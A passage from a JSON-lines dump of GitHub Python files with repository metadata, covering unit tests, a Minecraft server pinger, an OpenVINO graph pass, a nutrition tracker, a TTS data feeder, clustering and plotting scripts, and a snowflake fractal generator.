it\"\n\n\ndef test_to_json_dict():\n    new_json = {\n        \"id\": 1,\n        \"amount\": 500,\n        \"reason\": \"Need help\",\n        \"owner\": 1,\n        \"status\": 1,\n        \"response\": \"Sure you need it\"\n    }\n    TestCase().assertDictEqual(new_json, reimburse.to_json_dict())\n\n\ndef test_set_from_json_fail():\n    # Missing amount\n    new_json = {\n        \"reason\": \"Need help\",\n        \"owner\": 1\n    }\n    try:\n        reimburse.set_from_json(1, new_json)\n        assert False\n    except InvalidParamError:\n        assert True\n\n    # Missing reason\n    new_json = {\n        \"amount\": 1000,\n        \"owner\": 1\n    }\n    try:\n        reimburse.set_from_json(1, new_json)\n        assert False\n    except InvalidParamError:\n        assert True\n\n    # Missing owner id\n    new_json = {\n        \"reason\": \"Need help\",\n        \"amount\": 1000\n    }\n    try:\n        reimburse.set_from_json(1, new_json)\n        assert False\n    except InvalidParamError:\n        assert True\n\n\ndef test_set_from_json_invalid():\n    # Invalid amount\n    new_json = {\n        \"amount\": \"a letter\",\n        \"reason\": \"Need help\",\n        \"owner\": 1\n    }\n    try:\n        reimburse.set_from_json(1, new_json)\n        assert False\n    except InvalidParamError:\n        assert True\n\n    # Invalid owner\n    new_json = 
{\n \"amount\": 1000,\n \"reason\": \"Need help\",\n \"owner\": \"a letter\"\n }\n try:\n reimburse.set_from_json(1, new_json)\n assert False\n except InvalidParamError:\n assert True\n\n\ndef test_set_from_json_invalid_status():\n new_json = {\n \"amount\": 1000,\n \"reason\": \"Need help\",\n \"owner\": 1,\n \"status\": \"a letter\"\n }\n try:\n reimburse_second.set_from_json(2, new_json)\n assert False\n except InvalidParamError:\n assert True\n\n new_json = {\n \"amount\": 1000,\n \"reason\": \"Need help\",\n \"owner\": 1,\n \"status\": 200000000\n }\n try:\n reimburse_second.set_from_json(2, new_json)\n assert False\n except InvalidParamError:\n assert True\n\n\ndef test_set_from_json_pass():\n new_json = {\n \"amount\": 100,\n \"reason\": \"Need help*\",\n \"owner\": 3,\n \"status\": 1,\n \"response\": \"Sure\"\n }\n reimburse_second.set_from_json(2, new_json)\n assert reimburse_second.get_amount() == new_json[\"amount\"]\n assert reimburse_second.is_approved()\n assert reimburse_second.get_reason() == new_json[\"reason\"]\n assert reimburse_second.get_response() == new_json[\"response\"]\n assert reimburse_second.get_owner_id() == new_json[\"owner\"]\n","repo_name":"rtaylor4444/Revature-Project-1","sub_path":"Project 1/tests/reimbursement_test.py","file_name":"reimbursement_test.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70811199786","text":"from abc import ABC, abstractmethod\n\nfrom mcstatus import JavaServer\nfrom pydantic import BaseModel\n\n\nclass JavaPingTimeoutError(Exception):\n pass\n\n\nclass JavaPingRefusedError(Exception):\n pass\n\n\nclass JavaPingResultPlayer(BaseModel):\n id: str\n name: str\n\n\nclass JavaPingResult(BaseModel):\n version_protocol: int\n version_name: str\n latency: float\n players_online: int\n players_max: int\n players_sample: list[JavaPingResultPlayer]\n description: str\n favicon: str | None # Data URL\n\n\nclass JavaPingRepository(ABC):\n @abstractmethod\n def ping(self, host: str, port: int, timeout: float) -> JavaPingResult:\n ...\n\n\nclass JavaPingRepositoryImpl(JavaPingRepository):\n def ping(self, host: str, port: int, timeout: float) -> JavaPingResult:\n try:\n server = JavaServer.lookup(address=f\"{host}:{port}\", timeout=timeout)\n response = server.status()\n\n # sample is None when no player logged in\n players_sample = (\n response.players.sample if response.players.sample is not None else []\n )\n\n return JavaPingResult(\n version_protocol=response.version.protocol,\n version_name=response.version.name,\n latency=response.latency,\n players_online=response.players.online,\n players_max=response.players.max,\n players_sample=list(\n map(\n lambda player_sample: JavaPingResultPlayer(\n id=player_sample.id,\n name=player_sample.name,\n ),\n players_sample,\n )\n ),\n description=response.description,\n favicon=response.favicon,\n )\n except TimeoutError:\n raise JavaPingTimeoutError\n except ConnectionRefusedError:\n raise JavaPingRefusedError\n","repo_name":"aoirint/aoirint_mcping_server","sub_path":"aoirint_mcping_server/lib/repository/java_ping_repository.py","file_name":"java_ping_repository.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13023089749","text":"from mo.graph.graph import Graph\nfrom mo.middle.replacement import MiddleReplacementPattern\n\n\nclass 
RemoveUselessConcatSplitPattern(MiddleReplacementPattern):\n    \"\"\"\n    Remove useless construction with concat and split like follows:\n     / / | \\ \\\n    br1 br2 .. br(n-1)br(n)\n     \\ \\ | / /\n            concat\n              |\n            split\n     / / | \\ \\\n    br1 br2 .. br(n-1)br(n)\n\n    \"\"\"\n    enabled = True\n    force_clean_up = True\n\n    def run_after(self):\n        from extensions.middle.ReplaceSpliceNodePattern import ReplaceSpliceNodePattern\n        return [ReplaceSpliceNodePattern]\n\n    @staticmethod\n    def pattern():\n        return dict(\n            nodes=[('concat', dict(op='Concat')),\n                   ('data', dict(kind='data')),\n                   ('split', dict(op='Split'))],\n            edges=[('concat', 'data'),\n                   ('data', 'split')])\n\n    @staticmethod\n    def replace_pattern(graph: Graph, match: dict):\n        concat_node = match['concat']\n        split_node = match['split']\n\n        # don't apply the pass if concat has outputs other than split\n        if len(concat_node.out_port(0).get_destinations()) != 1:\n            return\n\n        inputs = list(concat_node.in_ports().values())\n        outputs = list(split_node.out_ports().values())\n\n        if len(inputs) != len(outputs):\n            return\n\n        for i in range(len(inputs)):\n            if not all(inputs[i].data.get_shape() == outputs[i].data.get_shape()):\n                return\n\n        for i in range(len(inputs)):\n            outputs[i].get_connection().set_source(inputs[i].get_source())\n            inputs[i].disconnect()\n","repo_name":"Namptiter/OpenVINO-Darknet-YOLOv3","sub_path":"model_optimizer/extensions/middle/RemoveUselessConcatSplit.py","file_name":"RemoveUselessConcatSplit.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"28011113393","text":"\n\ndef main():\n    user={\n        \"user_info\": [input(\"Welcome to our Apple Nutrition checker app, let's get you started by getting to know your Name: \"),input(\"Gender: \"),int(input(\"Age \")),int(input(\"Weight(kg): \"))],\n        \"user_nutri\":[ int(input(\"Daily Calorie Goal(kcal): \")),int(input(\"Daily Protein Goal(g): \")),int(input(\"Daily Fat Budget(g): \")),input(\"Is your goal a calorie Surplus or Deficit? \")] # the goal is kept as a string: it is compared with .lower() below\n    }\n    #exercise / hour\n    exercise={\n        \"sleeping\":60,\n        \"eating\":90,\n        \"standing\":100,\n        \"driving\":110,\n        \"housework\":140,\n        \"walking\":180,\n        \"dancing\":220,\n        \"running\": 320,\n        \"aerobics\": 420,\n        \"cycling\": 560,\n        \"lifting\": 520,\n        \"tenis\": 470,\n        \"swimming\": 620,\n        \"jogging\": 700,\n        \"basketball\": 600,\n    }\n    #serving size 100g\n    fruit={\n        \"apple\":[130,1,0],\n        \"banana\":[105,1,0],\n        \"orange\":[35,1,0],\n        \"pear\":[100,1,0],\n        \"peach\":[69,2,0],\n        \"grapefruit\":[52,1,0],\n        \"apricot\":[17,0,0],\n        \"passion_fruit\":[19,0,0],\n        \"cherry\":[130,1,0],\n        \"strawberry\":[32,1,3],\n        \"mango\":[65,1,0],\n        \"pineapple\":[278,5,1]\n    }\n    hi_pro={\n        \"beef\":[127,20,10],\n        \"chicken\":[120,26,2],\n        \"salmon\":[180,20,10],\n        \"tuna\":[100,13,6],\n        \"cottage cheese\":[90,13,1],\n        \"greek yogurt\":[101,5,3],\n        \"cheese\":[110,8,10],\n        \"egg\":[70,6,5],\n        \"beans\":[157,4,9],\n        \"milk\":[130,8,5],\n    }\n\n    cal_in=0\n    pro_in=0\n    fat_in=0\n    #Input calories intake\n    for x in range(int(input(\"How many types of food have you eaten?\\n\"))):\n        inc=input(\"What food have you eaten? \\n\")\n        if inc.lower() in fruit or inc.lower() in hi_pro: # was 'in fruit or hi_pro', which was always true because a non-empty dict is truthy\n            count=int(input(\"How many servings of \"+inc+\" have you eaten? 
\"))\n            if inc.lower() in fruit:\n                \n                cal_in+= (fruit[inc][0]*count)\n                pro_in+= (fruit[inc][1]*count)\n                fat_in+= (fruit[inc][2]*count)\n            elif inc.lower() in hi_pro:\n                cal_in+= (hi_pro[inc][0]*count)\n                pro_in+= (hi_pro[inc][1]*count)\n                fat_in+= (hi_pro[inc][2]*count)\n        else:\n            print(\"Our app does not have a database entry for that food.\")\n    print(\"Total calories intake: \"+str(cal_in)+\"\\nTotal protein intake: \"+str(pro_in)+\"\\nTotal fat intake: \"+str(fat_in))\n    \n    cal_burn=0\n    #Input activity to burn calories\n    for x in range(int(input(\"How many activities have you done?\\n\"))):\n        inp=input(\"What activities have you accomplished? \\n\")\n        if inp.lower() in exercise:\n            cal_burn+= (exercise[inp]*int(input(\"How many hours did you do that activity? \\n\")))\n        else:\n            print(\"Our app does not have a database entry for that activity.\")\n    print(\"Total calories burned: \"+str(cal_burn))\n    \n    # calorie meter: determine whether the user met their calorie goal\n    if cal_in>cal_burn:\n        if (user[\"user_nutri\"][3]).lower()!=\"surplus\":\n            print(\"Warning. You are currently in a calorie surplus of \"+str(cal_in-cal_burn)+\" calories\")\n            \n        else:\n            print(\"Fantastic. You are currently in a calorie surplus of \"+str(cal_in-cal_burn)+\" calories\")\n    elif cal_in<cal_burn:\n        if (user[\"user_nutri\"][3]).lower()==\"surplus\":\n            print(\"Warning. You are currently in a calorie deficit of \"+str(cal_burn-cal_in)+\" calories\") # deficit reported as a positive number\n        else:\n            print(\"Fantastic. You are currently in a calorie deficit of \"+str(cal_burn-cal_in)+\" calories\")\n\nmain()\n","repo_name":"huyhuynh1105/Huy-Huynh-s-Projects","sub_path":"Nutrition Tracker Application.py","file_name":"Nutrition Tracker Application.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3676940369","text":"from .db_config import (cursor, lock)\n\ndef column(table_name:str, column:str):\n    \"\"\" Return every value in the given column\n    Args:\n        table_name (str): the table that contains the column\n        column (str): the column whose values you want to extract\n    Returns:\n        list: a list of the column's values\n    \"\"\"\n    try:\n        lock.acquire(True)\n        cursor.execute(f\"SELECT {column} FROM {table_name}\")\n        return list(map(\n            lambda val: str(val).replace('<br>', '\\n'),\n            [val for table in cursor.fetchall() for val in table]\n        ))\n    finally:\n        lock.release()","repo_name":"TheAwiteb/randomChat","sub_path":"db/column.py","file_name":"column.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"ar","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"69827201069","text":"import tensorflow as tf;\r\nimport numpy as np;\r\nimport _pickle as pickle;\r\nfrom collections import deque;\r\nfrom random import shuffle;\r\nfrom threading import Thread;\r\nimport os, time, librosa, json;\r\nimport Hyper_Parameters as hp;\r\nfrom Audio import melspectrogram\r\n\r\nclass Feeder:\r\n    def __init__(\r\n        self,\r\n        is_Training= False\r\n        ):\r\n        self.is_Training = is_Training;\r\n\r\n        self.Placeholder_Generate();\r\n        self.Metadata_Load();\r\n\r\n        if self.is_Training:\r\n            if hp.Train.Use_Pre_in_Main_Train:\r\n                self.pre_Pattern_Queue = deque();\r\n                pre_Pattern_Generate_Thread = Thread(target=self.Train_Pattern_Generate, args=[True]);\r\n                pre_Pattern_Generate_Thread.daemon = True;\r\n                pre_Pattern_Generate_Thread.start();\r\n\r\n            self.pattern_Queue = deque();\r\n            pattern_Generate_Thread 
= Thread(target=self.Train_Pattern_Generate, args=[False]);\r\n pattern_Generate_Thread.daemon = True;\r\n pattern_Generate_Thread.start();\r\n\r\n def Placeholder_Generate(self):\r\n self.placeholder_Dict = {};\r\n with tf.variable_scope('placeholders') as scope:\r\n self.placeholder_Dict[\"Is_Training\"] = tf.placeholder(tf.bool, name=\"is_training_placeholder\"); #boolean \r\n self.placeholder_Dict[\"Token\"] = tf.placeholder(tf.int32, shape=(None, None, ), name=\"token_placeholder\"); #Shape: [batch_Size, token_Length];\r\n self.placeholder_Dict[\"Token_Length\"] = tf.placeholder(tf.int32, shape=(None,), name=\"token_length_placeholder\"); #[batch_Size];\r\n self.placeholder_Dict[\"Mel\"] = tf.placeholder(tf.float32, shape=(None, None, hp.Sound.Mel_Dim), name=\"mel_placeholder\"); #Shape: [batch_Size, spectrogram_Length, mel_Spectrogram_Dimension];\r\n self.placeholder_Dict[\"Mel_Length\"] = tf.placeholder(tf.int32, shape=(None,), name=\"mel_length_placeholder\"); #[batch_Size];\r\n self.placeholder_Dict['Speaker_Embedding_Mel'] = tf.placeholder(tf.float32, shape=(None, None, hp.Sound.Mel_Dim), name='speaker_embedding_mel_placeholder'); #Shape: [batch_Size, spectrogram_Length, mel_Spectrogram_Dimension];\r\n \r\n def Metadata_Load(self):\r\n if self.is_Training:\r\n with open(os.path.join(hp.Train.Pattern_Path, hp.Train.Metadata_File.upper()).replace(\"\\\\\", \"/\"), 'rb') as f:\r\n self.metadata_Dict = pickle.load(f)\r\n\r\n if not all([\r\n len(self.metadata_Dict['Token_Index_Dict']) == hp.Encoder.Embedding.Token_Size,\r\n self.metadata_Dict['Spectrogram_Dim'] == hp.Sound.Spectrogram_Dim,\r\n self.metadata_Dict['Mel_Dim'] == hp.Sound.Mel_Dim,\r\n self.metadata_Dict['Frame_Shift'] == hp.Sound.Frame_Shift,\r\n self.metadata_Dict['Frame_Length'] == hp.Sound.Frame_Length,\r\n self.metadata_Dict['Sample_Rate'] == hp.Sound.Sample_Rate,\r\n ]):\r\n raise ValueError('The metadata information and hyper parameter setting are not consistent.')\r\n\r\n else:\r\n with open('Token_Index_Dict.json', 'r') as f:\r\n self.metadata_Dict = {'Token_Index_Dict': json.load(f)}\r\n\r\n def Speaker_Embedding_Mel(self, mel_List):\r\n required_Mel_Length = \\\r\n hp.Speaker_Embedding.Inference.Sample_Nums * (hp.Speaker_Embedding.Inference.Mel_Frame - hp.Speaker_Embedding.Inference.Overlap_Frame) + \\\r\n hp.Speaker_Embedding.Inference.Overlap_Frame\r\n\r\n new_Mel_Pattern = np.zeros(\r\n (\r\n len(mel_List),\r\n hp.Speaker_Embedding.Inference.Sample_Nums,\r\n hp.Speaker_Embedding.Inference.Mel_Frame,\r\n hp.Sound.Mel_Dim\r\n ),\r\n dtype=np.float32\r\n )\r\n\r\n for index, mel in enumerate(mel_List):\r\n if mel.shape[0] < required_Mel_Length:\r\n #All samples are the same because the mel length is too short.\r\n sample_Mel = mel[:hp.Speaker_Embedding.Inference.Mel_Frame]\r\n new_Mel_Pattern[index, :, :sample_Mel.shape[0]] = sample_Mel\r\n else:\r\n for sample_Index in range(hp.Speaker_Embedding.Inference.Sample_Nums):\r\n start_Point = int((mel.shape[0] - required_Mel_Length) / 2) + sample_Index * hp.Speaker_Embedding.Inference.Overlap_Frame #Middle of mel\r\n new_Mel_Pattern[index, sample_Index] = mel[start_Point:start_Point + hp.Speaker_Embedding.Inference.Mel_Frame]\r\n\r\n return np.reshape(new_Mel_Pattern, (-1, hp.Speaker_Embedding.Inference.Mel_Frame, hp.Sound.Mel_Dim))\r\n \r\n def Train_Pattern_Generate(self, is_Pre_Train = False):\r\n if is_Pre_Train:\r\n file_List = [path for path in self.metadata_Dict['File_List'] if self.metadata_Dict['Dataset_Dict'][path] in 
hp.Train.Pre_Train_Dataset_List]\r\n pattern_Queue = self.pre_Pattern_Queue\r\n else:\r\n file_List = [path for path in self.metadata_Dict['File_List'] if self.metadata_Dict['Dataset_Dict'][path] in hp.Train.Main_Train_Dataset_List]\r\n pattern_Queue = self.pattern_Queue\r\n\r\n min_Mel_Length = hp.Train.Use_Wav_Length_Range[0] / hp.Sound.Frame_Shift\r\n max_Mel_Length = hp.Train.Use_Wav_Length_Range[1] / hp.Sound.Frame_Shift\r\n path_List = [\r\n (path, self.metadata_Dict['Mel_Length_Dict'][path])\r\n for path in file_List\r\n if self.metadata_Dict['Mel_Length_Dict'][path] >= min_Mel_Length and self.metadata_Dict['Mel_Length_Dict'][path] <= max_Mel_Length\r\n ]\r\n print(\r\n 'Pre train pattern info' if is_Pre_Train else 'Main train pattern info', '\\n',\r\n 'Total pattern count: {}'.format(len(self.metadata_Dict['Mel_Length_Dict'])), '\\n',\r\n 'Use pattern count: {}'.format(len(path_List)), '\\n',\r\n 'Excluded pattern count: {}'.format(len(self.metadata_Dict['Mel_Length_Dict']) - len(path_List))\r\n )\r\n\r\n if hp.Train.Pattern_Sorting_by_Mel_Length:\r\n path_List = [file_Name for file_Name, _ in sorted(path_List, key=lambda x: x[1])]\r\n else:\r\n path_List = [file_Name for file_Name, _ in path_List]\r\n\r\n while True:\r\n if not hp.Train.Pattern_Sorting_by_Mel_Length:\r\n shuffle(path_List)\r\n\r\n path_Batch_List = [\r\n path_List[x:x + hp.Train.Batch_Size]\r\n for x in range(0, len(path_List), hp.Train.Batch_Size)\r\n ]\r\n shuffle(path_Batch_List)\r\n #path_Batch_List = path_Batch_List[0:2] + list(reversed(path_Batch_List)) #Code for checking that the batch size is adequate; no problem once it has run 10 or more times\r\n\r\n batch_Index = 0;\r\n while batch_Index < len(path_Batch_List):\r\n if len(pattern_Queue) >= hp.Train.Max_Pattern_Queue:\r\n time.sleep(0.1);\r\n continue;\r\n\r\n pattern_Count = len(path_Batch_List[batch_Index]);\r\n\r\n token_List = []\r\n mel_List = []\r\n for file_Path in path_Batch_List[batch_Index]:\r\n with open(os.path.join(hp.Train.Pattern_Path, file_Path).replace(\"\\\\\", \"/\"), \"rb\") as f:\r\n pattern_Dict = pickle.load(f);\r\n \r\n token_List.append(np.hstack([\r\n self.metadata_Dict['Token_Index_Dict']['<S>'],\r\n pattern_Dict['Token'],\r\n self.metadata_Dict['Token_Index_Dict']['<E>']\r\n ]))\r\n mel_List.append(pattern_Dict['Mel'])\r\n\r\n max_Token_Length = max([token.shape[0] for token in token_List])\r\n max_Mel_Length = max([mel.shape[0] for mel in mel_List])\r\n\r\n new_Token_Pattern = np.zeros(\r\n shape=(pattern_Count, max_Token_Length),\r\n dtype= np.int32\r\n )\r\n new_Token_Pattern += self.metadata_Dict['Token_Index_Dict']['<E>'] #I think this is useless...\r\n new_Mel_Pattern = np.zeros(\r\n shape=(pattern_Count, max_Mel_Length, hp.Sound.Mel_Dim),\r\n dtype= np.float32\r\n )\r\n\r\n for pattern_Index, (token, mel) in enumerate(zip(token_List, mel_List)): \r\n new_Token_Pattern[pattern_Index, :token.shape[0]] = token;\r\n new_Mel_Pattern[pattern_Index, :mel.shape[0]] = mel;\r\n \r\n pattern_Queue.append({\r\n self.placeholder_Dict[\"Is_Training\"]: True,\r\n self.placeholder_Dict[\"Token\"]: new_Token_Pattern,\r\n self.placeholder_Dict[\"Token_Length\"]: np.array([token.shape[0] for token in token_List]).astype(np.int32),\r\n self.placeholder_Dict[\"Mel\"]: new_Mel_Pattern,\r\n self.placeholder_Dict[\"Mel_Length\"]: np.array([mel.shape[0] for mel in mel_List]).astype(np.int32),\r\n self.placeholder_Dict['Speaker_Embedding_Mel']: self.Speaker_Embedding_Mel(mel_List),\r\n })\r\n\r\n batch_Index += 1;\r\n\r\n def Get_Train_Pattern(self, is_Pre_Train = False):\r\n if is_Pre_Train:\r\n 
pattern_Queue = self.pre_Pattern_Queue\r\n else:\r\n pattern_Queue = self.pattern_Queue\r\n\r\n while len(pattern_Queue) == 0: #When training is faster than pattern generation, the model has to wait.\r\n time.sleep(0.01);\r\n return pattern_Queue.popleft();\r\n\r\n def Get_Inference_Pattern(self, speaker_Wav_Path_List, text_List):\r\n pattern_Count = len(text_List)\r\n\r\n token_List = [\r\n np.array(\r\n [self.metadata_Dict['Token_Index_Dict']['<S>']] +\r\n [self.metadata_Dict['Token_Index_Dict'][letter] for letter in text.upper()] +\r\n [self.metadata_Dict['Token_Index_Dict']['<E>']]\r\n ).astype(np.int32)\r\n for text in text_List\r\n ]\r\n\r\n max_Token_Length = max([token.shape[0] for token in token_List])\r\n\r\n new_Token_Pattern = np.zeros(\r\n shape=(pattern_Count, max_Token_Length),\r\n dtype= np.int32\r\n )\r\n new_Token_Pattern += self.metadata_Dict['Token_Index_Dict']['<E>'] #I think this is useless...\r\n new_Mel_Pattern = np.zeros(\r\n shape=(pattern_Count, 1, hp.Sound.Mel_Dim),\r\n dtype= np.float32\r\n )\r\n\r\n for pattern_Index, token in enumerate(token_List): \r\n new_Token_Pattern[pattern_Index, :token.shape[0]] = token;\r\n\r\n speaker_Embedding_Mel_List = [\r\n np.transpose(melspectrogram(\r\n y= librosa.effects.trim(librosa.core.load(path, sr = hp.Sound.Sample_Rate)[0], top_db=15, frame_length=32, hop_length=16)[0] * 0.99,\r\n num_freq= hp.Sound.Spectrogram_Dim,\r\n frame_shift_ms= hp.Sound.Frame_Shift,\r\n frame_length_ms= hp.Sound.Frame_Length,\r\n num_mels= hp.Sound.Mel_Dim,\r\n sample_rate= hp.Sound.Sample_Rate,\r\n max_abs_value= hp.Sound.Max_Abs_Mel\r\n ).astype(np.float32))\r\n for path in speaker_Wav_Path_List\r\n ]\r\n\r\n return {\r\n self.placeholder_Dict[\"Is_Training\"]: False,\r\n self.placeholder_Dict[\"Token\"]: new_Token_Pattern,\r\n self.placeholder_Dict[\"Token_Length\"]: np.array([token.shape[0] for token in token_List]).astype(np.int32),\r\n self.placeholder_Dict[\"Mel\"]: new_Mel_Pattern,\r\n self.placeholder_Dict[\"Mel_Length\"]: np.array([0 for _ in text_List]).astype(np.int32),\r\n self.placeholder_Dict['Speaker_Embedding_Mel']: self.Speaker_Embedding_Mel(speaker_Embedding_Mel_List), \r\n }","repo_name":"CODEJIN/multi_speaker_tts","sub_path":"Feeder.py","file_name":"Feeder.py","file_ext":"py","file_size_in_byte":12012,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"37"} +{"seq_id":"21066329788","text":"import math\n\nveelo = float(0)\ngravoo = 9.8\ntimeTot = 10\ntimeInc = .01\n\ni = 0\n# Compare with < rather than != : with a float increment, i never exactly equals timeTot\nwhile i < timeTot:\n veelo += gravoo * timeInc\n i += timeInc\n\nprint(\"Averaged velocity: \", gravoo * timeTot)\nprint(\"Summed velocity: \", veelo)\n\n# test to see if velocity can be summed over time as well as averaged\n# essentially bruteforcing an integral\n","repo_name":"thespacemans/misc_stuff","sub_path":"FreefallCalc/piecemealtest.py","file_name":"piecemealtest.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18379361255","text":"import csv\nfrom sklearn import cluster\nimport numpy as np\n\nf = open('food.csv')\ncsv_f = csv.reader(f)\nval = [row for row in csv_f]\n\npoints = []\ncountries = []\nfor i in range(1,87):\n\tpoints.append(tuple(val[i][9:52]))\n\tcountries.append(val[i][0])\n\nn_class = 7\npoints = np.asarray(points)\nk_means_pp = cluster.KMeans(init='k-means++', n_clusters=n_class, n_init=5)\nk_means_pp.fit(points)\nlabels = k_means_pp.labels_\n\nfhabit = 
open('habit.txt','w')\nfor label in labels:\n\tfhabit.write('Habit'+str(label))\n\tfhabit.write('\\n')\n\nfhabit.close()\nf.close()","repo_name":"ydst22502/HKU-visualization","sub_path":"food_k_means.py","file_name":"food_k_means.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70580686829","text":"# 1. Find the highest-rated movie in the “Quest” story type.\n\nimport pandas as pd\n\ndf = pd.read_csv('HollywoodMovies.csv')\n\nhighest_rate = df[df[\"Story\"] == \"Quest\"][\"RottenTomatoes\"].max()\n\nhighest_rated_movies = df[df[\"RottenTomatoes\"] == highest_rate]\n\nprint(highest_rated_movies)\n","repo_name":"JangirSumit/data_science","sub_path":"19th May Assignments/case study 1/question_1.py","file_name":"question_1.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"3115351755","text":"import pygame as pg\r\nfrom time import perf_counter\r\nfrom shapely.geometry import Point, Polygon\r\n\r\n# Variables\r\nSQRT_3 = 3 ** (1 / 2)\r\nWHITE = (255, 255, 255)\r\nA = [(100, 600), (700, 600), (400, 80)]\r\ntriangles = A.copy()\r\n\r\n# Initialization\r\npg.init()\r\nscreen = pg.display.set_mode((800, 800))\r\n\r\n# Functions\r\ndistance = lambda x, y: ((x[0] - y[0]) ** 2 + (x[1] - y[1]) ** 2) ** 0.5\r\n\r\n\r\ndef generatePoints(pt1, pt2, reference):\r\n slope = (pt1[1] - pt2[1]) / (pt1[0] - pt2[0])\r\n a = pt1[0] + (pt2[0] - pt1[0]) / 3\r\n b = pt1[1] + (pt2[1] - pt1[1]) / 3\r\n c = pt1[0] + (pt2[0] - pt1[0]) * 2 / 3\r\n d = pt1[1] + (pt2[1] - pt1[1]) * 2 / 3\r\n ptm = (pt1[0] + pt2[0]) / 2, (pt1[1] + pt2[1]) / 2\r\n dis = distance((a, b), (c, d))\r\n h = SQRT_3/2 * dis\r\n if slope == 0:\r\n ptc1 = ptm[0], ptm[1] - h\r\n ptc2 = ptm[0], ptm[1] + h\r\n ptc = ptc1 if distance(reference, ptc1) > distance(ptc2, reference) else ptc2\r\n return (round(a), round(b)), (round(c), round(d)), ptc\r\n perp = -1 / slope\r\n x_c = h / (perp ** 2 + 1) ** 0.5\r\n y_c = perp * x_c\r\n ptc1 = round(ptm[0] - x_c), round(ptm[1] - y_c)\r\n ptc2 = round(ptm[0] + x_c), round(ptm[1] + y_c)\r\n ptc = ptc1 if distance(reference, ptc1) > distance(ptc2, reference) else ptc2\r\n return (round(a), round(b)), (round(c), round(d)), ptc\r\n\r\n\r\ndef generatePoints_2(pt1, pt2, father: Polygon):\r\n slope = (pt1[1] - pt2[1]) / (pt1[0] - pt2[0])\r\n a = pt1[0] + (pt2[0] - pt1[0]) / 3\r\n b = pt1[1] + (pt2[1] - pt1[1]) / 3\r\n c = pt1[0] + (pt2[0] - pt1[0]) * 2 / 3\r\n d = pt1[1] + (pt2[1] - pt1[1]) * 2 / 3\r\n ptm = (pt1[0] + pt2[0]) / 2, (pt1[1] + pt2[1]) / 2\r\n dis = distance((a, b), (c, d))\r\n h = SQRT_3/2 * dis\r\n if slope == 0:\r\n ptc1 = ptm[0], ptm[1] - h\r\n ptc2 = ptm[0], ptm[1] + h\r\n ptc = ptc1 if father.contains(Point(*ptc2)) else ptc2\r\n return (round(a), round(b)), (round(c), round(d)), ptc\r\n perp = -1 / slope\r\n x_c = h / (perp ** 2 + 1) ** 0.5\r\n y_c = perp * x_c\r\n ptc1 = round(ptm[0] - x_c), round(ptm[1] - y_c)\r\n ptc2 = round(ptm[0] + x_c), round(ptm[1] + y_c)\r\n ptc = ptc1 if father.contains(Point(*ptc2)) else ptc2\r\n return (round(a), round(b)), (round(c), round(d)), ptc\r\n\r\n\r\ndef next(arr):\r\n array = arr.copy()\r\n org = arr.copy()\r\n for j in range(len(org)):\r\n pt1 = org[j]\r\n pt2 = org[(j + 1) % (len(org))]\r\n ref = None\r\n for triangle in triangles:\r\n if pt1 in triangle and pt2 in triangle:\r\n b = triangle.copy()\r\n b.remove(pt1)\r\n b.remove(pt2)\r\n ref = b[0]\r\n 
if ref == None:\r\n pta, ptb, ptc = generatePoints_2(pt1, pt2, Polygon(array))\r\n else:\r\n pta, ptb, ptc = generatePoints(pt1, pt2, ref)\r\n index = array.index(pt2)\r\n array.insert(index, ptb)\r\n array.insert(index, ptc)\r\n array.insert(index, pta)\r\n triangles.append([pta, ptb, ptc])\r\n return array\r\n\r\n\r\ndef genRec(level):\r\n if level == 0:\r\n return A\r\n else:\r\n return next(genRec(level - 1))\r\n\r\nstart = perf_counter()\r\nA = genRec(4)\r\n\r\n# Game Loop\r\nwhile True:\r\n pg.draw.polygon(screen, WHITE, A)\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n quit(0)\r\n pg.display.update()\r\n print(perf_counter() - start)\r\n","repo_name":"tejaDhulipala/SnowflakeGen","sub_path":"AlgorithmA.py","file_name":"AlgorithmA.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37798995807","text":"import os\nimport shutil\nfrom collections import defaultdict\nfrom copy import deepcopy\nimport numpy as np\nfrom uninas.tasks.abstract import AbstractTask, AbstractNetTask\nfrom uninas.models.networks.uninas.search import SearchUninasNetwork\nfrom uninas.methods.strategy_manager import StrategyManager\nfrom uninas.optimization.task import common_s2_net_args_to_add, common_s2_extend_args, common_s2_prepare_run\nfrom uninas.optimization.benchmarks.mini.benchmark import MiniNASBenchmark, MiniResult\nfrom uninas.optimization.benchmarks.mini.tabular import MiniNASTabularBenchmark, explore\nfrom uninas.optimization.benchmarks.mini.tabular_search import MiniNASSearchTabularBenchmark\nfrom uninas.optimization.hpo.uninas.algorithms.abstract import AbstractHPO\nfrom uninas.optimization.hpo.uninas.algorithms.randomly import RandomlyEval\nfrom uninas.optimization.hpo.uninas.values import DiscreteValues, ValueSpace, SpecificValueSpace\nfrom uninas.utils.paths import replace_standard_paths\nfrom uninas.utils.misc import split\nfrom uninas.utils.args import MetaArgument, Argument, Namespace, find_in_args\nfrom uninas.utils.loggers.python import log_headline, Logger\nfrom uninas.register import Register\nfrom uninas.builder import Builder\n\n\nclass SelfHPOUtils:\n \"\"\"\n shared parts\n \"\"\"\n\n @staticmethod\n def prepare(cls: AbstractTask.__class__, logger: Logger, estimator_kwargs: dict, args: Namespace, index=None)\\\n -> (AbstractHPO, [], []):\n 